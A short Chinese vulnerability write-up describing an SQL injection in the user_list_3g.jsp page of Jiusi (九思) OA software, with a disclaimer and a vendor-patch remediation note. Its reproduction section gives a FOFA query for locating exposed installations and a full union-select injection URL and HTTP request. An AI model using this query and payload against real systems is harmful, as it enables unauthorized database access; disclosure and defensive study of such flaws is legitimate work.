文章目录
- 前言
- 声明
- 一、漏洞描述
- 二、影响版本
- 三、漏洞复现
- 四、修复建议
前言
九思软件为中国高端OA系统知名品牌,九思OA软件user_list_3g.jsp存在SQL注入漏洞。
声明
请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。
一、漏洞描述
九思软件为中国高端OA系统知名品牌,九思OA软件user_list_3g.jsp存在SQL注入漏洞。
二、影响版本
九思OA软件
三、漏洞复现
FOFA查询语句:app="九思软件-OA"
漏洞链接:http://127.0.0.1/jsoa/wap2/personalMessage/user_list_3g.jsp?userIds=1&userNames=1&content=1&org_id=1%20union/**/select/**/1,md5(1)%20%23
漏洞数据包:
GET /jsoa/wap2/personalMessage/user_list_3g.jsp?userIds=1&userNames=1&content=1&org_id=1%20union/**/select/**/1,md5(1)%20%23 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
Accept: */*
Connection: Keep-Alive
四、修复建议
请联系厂商更新补丁:http://www.jiusi.net/
